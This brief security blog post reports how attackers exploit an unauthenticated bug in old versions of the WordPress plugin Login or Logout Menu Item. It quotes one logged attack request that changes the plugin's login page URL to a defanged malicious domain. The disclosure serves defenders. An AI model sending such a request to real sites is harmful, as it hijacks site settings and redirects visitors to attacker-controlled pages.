These kind of bugs are always the first choice for bad actors—they don’t need any authentication on the site, it’s monetizable, and really easy to automate.

Here's how they are exploiting this particular bug in old versions of the plugin Login or Logout Menu Item:

192.169.157.142 - lolmi_settings_submit=1&lolmi_login_page_url=http[:]//gabriellalovecats[.]com/wp-login.php [0/Aug/2019] "POST /wp-admin/admin-post.php?action=lolmi_save_settings HTTP/1.1"

Aug 20, 2019 by John Castro